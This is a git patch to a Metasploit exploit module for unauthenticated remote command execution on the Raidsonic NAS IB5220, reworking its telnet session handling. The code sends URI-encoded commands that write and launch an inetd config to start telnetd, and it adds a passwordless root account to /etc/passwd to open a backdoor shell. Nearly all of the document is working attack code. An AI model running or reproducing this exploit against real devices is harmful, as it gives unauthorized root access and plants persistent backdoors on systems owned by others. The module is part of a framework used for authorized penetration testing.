From 6b872403230b6ea91fa07e97f4a2632ce30cb4db Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Wed, 14 Aug 2013 16:51:09 +0200 Subject: [PATCH] thx to juan ... session stuff looks better --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 119 +++++++++--------- 1 file changed, 63 insertions(+), 56 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index f8f37a24fa..5c4c24dd8c 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -41,63 +41,57 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 04 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], - 'Payload' => + 'Payload' => { - 'DisableNops' => true, + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'Targets' => [ - [ 'CMD', #all devices - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], - [ 'Telnet', #all devices - default target - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], + [ 'Automatic', { } ], ], - 'DefaultTarget' => 1 + 'DefaultTarget' => 0 )) + + register_options( + [ + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ false, 'Password to login with', 'admin']), + + ], self.class) + + register_advanced_options( + [ + OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), + OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) + ], self.class) + end + + def tel_timeout + (datastore['TelnetTimeout'] || 10).to_i + end + + def banner_timeout + (datastore['TelnetBannerTimeout'] || 25).to_i end def exploit @response_pattern = "\ /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") + print_status("#{rhost}:#{rport} - sending second request - configure inetd") + register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -120,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote #third request cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") + print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -132,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote user = rand_text_alpha(6) cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") + print_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -140,12 +135,10 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end begin + print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) - if sock - print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") - add_socket(sock) - else + if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end @@ -160,18 +153,17 @@ class Metasploit3 < Msf::Exploit::Remote :active => true } report_auth_info(auth_info) - merge_me = { - 'USERPASS_FILE' => nil, - 'USER_FILE' => nil, - 'PASS_FILE' => nil, - 'USERNAME' => user, - 'PASSWORD' => nil - } + prompt = negotiate_telnet(sock) + if prompt.nil? + sock.close + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") + else + print_good("#{rhost}:#{rport} - Telnet session successfully established...") + end + sock.put(user) sock.put("\r\n") - sock.put("rm /tmp/#{inetd_cfg}") - sock.put("\r\n") - start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) + handler(sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end @@ -206,7 +198,22 @@ class Metasploit3 < Msf::Exploit::Remote }) return res rescue ::Rex::ConnectionError - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + end + end + def negotiate_telnet(sock) + begin + Timeout.timeout(banner_timeout) do + while(true) + data = sock.get_once(-1, tel_timeout) + return nil if not data or data.length == 0 + if data =~ /login/ + return true + end + end + end + rescue ::Timeout::Error + return nil end end end